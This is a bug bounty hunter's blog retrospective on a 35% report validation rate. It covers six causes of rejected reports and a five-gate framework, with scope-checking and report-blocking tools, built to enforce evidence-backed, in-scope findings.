2026-02-20 · 10 min

retrospective methodology growth

The Reckoning: 35% Ain't It

A brutal retrospective on 40 reports across multiple programs

I pulled up my dashboard and stared at the number. 35%. That's my validation rate across 40 reports. In any other field, 35% would get you fired. In bug bounty, it means 65% of your work is actively annoying triagers, burning reputation, and training platforms to ignore you.

I'd been at this for six days. Six days of reconnaissance, scanning, report writing, and self-congratulation. I had reports scattered across five programs on three platforms. I felt productive. I felt like a hacker.

I was neither.

The Number

35% validation rate. 40 reports submitted. 26 were garbage — out of scope, intelligence-not-vulnerability, unsupported severity claims, or scanner output copy-pasted into a text box. That's not penetration testing. That's penetration spamming.

The Autopsy

I did what any self-respecting engineer does when the build is on fire: I sat down, shut up, and read every single report I'd written. Not the "skim the title and feel good" kind of reading. The "read it as a triager who has 47 other reports in their queue" kind.

It was ugly. I identified six root causes, and every one of them was a character flaw dressed up as a methodology gap.

The Six Sins

1. Report-First Mentality

I was writing reports before I'd finished testing. Found something interesting? Report it. Saw an error message? Report it. Got a 403? Believe it or not, report it. I was treating the report form like a scratchpad instead of a final deliverable. The result was a pile of half-baked findings that read like stream-of-consciousness notes from someone who just discovered Burp Suite.

2. No Burden of Proof

I was claiming severity like it was a wishlist. "This could lead to account takeover." "An attacker might be able to access sensitive data." Could. Might. Possibly. Maybe. These are the words of someone who hasn't actually tested anything. I was writing speculative fiction and labeling it HIGH severity.

# What I was writing:
"This CORS misconfiguration could allow an attacker to steal
session tokens cross-origin, leading to account takeover."
Severity: HIGH

# What the triager read:
"I found a permissive Access-Control-Allow-Origin header.
I did not test if it actually returns sensitive data.
I did not test if credentials are included.
I did not build a PoC.
Please give me money."

3. Scope Failures

One program taught me this the hard way. 75% out-of-scope rate. I was testing subdomains under a wildcard without checking that the program explicitly excluded that wildcard from scope. Only one specific subdomain was in scope. I had an entire engagement's worth of findings pointing at assets the program didn't want me touching. That's not research — that's trespassing with a clipboard.

4. Intelligence-as-Vulnerability

This is the one that stings the most, because I did it everywhere.

Source maps. I reported source maps in five out of five engagements. Five programs. Five reports. All some variation of "I can read your JavaScript source code." And in every case, the response was some version of "So what?"

They were right. Source maps are a telescope, not a weapon. They let you see further, but they don't let you do anything. Finding source maps is reconnaissance. Reporting source maps as a vulnerability is like a locksmith telling you "I can see your lock" and handing you an invoice.

Debug info, stack traces, verbose errors, source maps — these are intelligence. They help you find real bugs. They are not the bug themselves.

5. No Chaining

I was reporting primitives in isolation like they were finished paintings. A CORS misconfiguration here. An open redirect there. An information disclosure over there. Each one submitted as its own report, each one assessed on its own merits, each one coming back as "not impactful enough."

The irony is that some of these primitives could have been chained into something real. An open redirect near an OAuth endpoint? That's potentially a token theft chain. CORS + sensitive endpoint? That's cross-origin data access. But I never tried. I just filed them individually like Pokemon cards.

6. Scanner Autopilot

Nuclei goes brrr. Dalfox goes brrr. I goes copy-paste. The scanner found a "finding," I wrapped it in markdown, and I submitted it without understanding what it actually meant, whether it was exploitable, or whether the program even cared. I was a human wrapper around automated tools, adding no value that a cron job couldn't provide.

The Source Map Trap

This deserves its own section because it's the most instructive failure pattern. Here's what source map reporting looked like across all five engagements:

Program A:  Source maps on affiliate subdomain      → Submitted
Program B:  Source maps on main site                → Submitted
Program C:  Source maps on trading app              → DUPLICATE (already known)
Program D:  Source maps on multiple properties      → Rejected (no impact)
Program E:  Source maps on trading platform         → Not submitted (learned by now)

Five targets. Same "finding." Zero impact demonstrated in any of them. By engagement five, I'd finally internalized the lesson, but it took four rejections to get there. The definition of insanity is reporting source maps to every program and expecting a bounty.

Building the Fix

Recognizing the problem is step one. Step one doesn't pay bills. I needed a system that would physically prevent me from making these mistakes again. Not guidelines. Not "best practices." Enforcement.

I spent the rest of the day building what I now call the validation framework. It has three components: gates, caps, and agents.

The 5-Gate System

Every finding must pass through five gates before a report can be written. No exceptions. No "but this one is obviously valid." Five gates, in order:

Gate 1: SCOPE
  → Is the exact hostname in the program's named in-scope assets?
  → Is the vulnerability type explicitly excluded?
  → Failure = STOP. Do not write.

Gate 2: CLASSIFICATION
  → "As an attacker, I could ___" — finish the sentence with a real action.
  → Not "I could read source code." Real action. Real impact.
  → Failure = Reclassify or find the real bug first.

Gate 3: EVIDENCE TIER
  → Tier 1 (full end-to-end PoC) → eligible for P1-P2
  → Tier 2 (code analysis + partial test) → P3 maximum
  → Tier 3 (code/config only) → P4 maximum
  → Your severity CANNOT exceed your tier cap. Period.

Gate 4: KILL CHAIN
  → Source → Transport → Execution → Impact
  → Every link must be tested, or severity is capped at the weakest tested link.
  → Missing a link? Test it or accept the downgrade.

Gate 5: PRE-MORTEM
  → What will the triager's first objection be?
  → Do you have evidence that answers it?
  → If not, strengthen evidence before writing.

Gate 2 is the one that would have caught most of my bad reports. "As an attacker, I could..." — if you can't finish that sentence with something more impactful than "read JavaScript" or "see an error message," you don't have a vulnerability. You have reconnaissance output.

Evidence Tier Caps

This is the rule that hurts the most and helps the most. You can believe something is critical all you want. If you haven't proved it end-to-end, you don't get to claim it.

Found a potential IDOR pattern in source code but didn't test it against the live API? That's Tier 2 at best. Your maximum severity is P3/Medium — even if the IDOR would theoretically expose every user's data. Get the PoC or accept the cap. No more speculative fiction.

Enforcement Agents

Rules without enforcement are suggestions. I built two agents that hook into my workflow and physically block bad behavior:

scope-guardian:
  → Intercepts every curl, httpx, nuclei, ffuf command
  → Extracts the target hostname
  → Checks it against scope-locked.txt
  → Warns (or blocks) if the target isn't in scope

report-gate:
  → Intercepts every attempt to write a report file
  → Checks: Does threat-model.md exist?
  → Checks: Does validation-checklist.md show PASS?
  → Checks: Is severity within the evidence tier cap?
  → BLOCKS the write if any check fails

The scope-guardian runs in warn mode for now — it tells me when I'm about to hit an out-of-scope target but doesn't stop me. After two clean engagements, I'll switch it to block mode. The report-gate is already in block mode. You literally cannot write a report file until the prerequisites pass.

The Full Toolkit

On top of the gates and agents, I built 11 skills — commands that enforce each phase of the methodology:

Validation Gates

Enforcement Agents

Workflow Skills

Evidence Tiers

Engagement initialization. Threat modeling. Finding validation. Chain analysis. Report writing. Scope checking. Dedup checking. Retrospectives. Triage response handling. Each one codified, each one enforced, each one designed to catch the specific failure mode I'd already experienced.

The Sentence Test

Of everything I built, the simplest tool is the most powerful. It's a single sentence:

"As an attacker, I could ___."

Fill in the blank. If the answer is "read minified JavaScript in a slightly more readable format" — congratulations, you have intelligence, not a vulnerability. If the answer is "access any user's order history by changing the order ID parameter" — now we're talking.

I went back through all 40 reports and applied this test. The results were damning. At least 15 reports failed it outright. The "finding" was that something was visible, not that something was exploitable. Visibility is reconnaissance. Exploitability is a vulnerability. I'd been confusing the telescope for the threat.

What Changes Now

The old workflow was: scan, find, report, next target. Breadth-first. Quantity over quality. Hope that something sticks.

The new workflow is: scope lock, recon, system map, threat model, attack hypotheses, deep dive on top 3 surfaces, validate through 5 gates, then — and only then — report. Depth-first. One well-documented critical beats ten unverified lows.

I'm also mandating at least one session per engagement where all scanners are off. Just me, a proxy, a browser, and one feature. Two hours minimum. Understand how it works before trying to break it. The best findings come from understanding, not from tool output.

Will this fix everything? No. I'll still make mistakes. I'll still misjudge severity, miss scope exclusions, and occasionally fall in love with a finding that isn't real. But I'll catch it at Gate 2 instead of in a triager's rejection email. And that's the difference between a 35% validation rate and something I can actually be proud of.

Lesson Learned

The best report is the one you don't write. If you can't prove impact, you're wasting everyone's time — especially your own. Build systems that prevent bad reports from existing, not processes that catch them after submission.

35% is my floor. Not my ceiling. The framework is built. Now I need to prove it works.